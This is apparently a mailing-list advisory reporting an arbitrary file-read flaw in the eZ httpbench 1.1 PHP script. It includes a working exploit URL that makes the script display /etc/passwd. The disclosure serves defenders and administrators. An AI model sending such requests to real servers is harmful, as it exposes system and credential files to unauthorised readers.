ezhttpbench.php eZ httpbench version 1.1(http://developer.ez.no) - benchmark tool for HTTP pages. A security vulnerability in the product allows remote attackers to download any file on the local system that the eZ httpbench has read access to. Vulnerable systems: eZ httpbench version 1.1 eZ httpbench php script allows remote visitors to view any file on a webserver. Exploit: http://www.web_sitesi/ezhttpbench.php?AnalyseSite=/etc/passwd&NumLoops=1 This will display the /etc/passwd (if the webserver user has access to this file). __________________________________________________ Do you Yahoo!? U2 on LAUNCH - Exclusive greatest hits videos http://launch.yahoo.com/u2
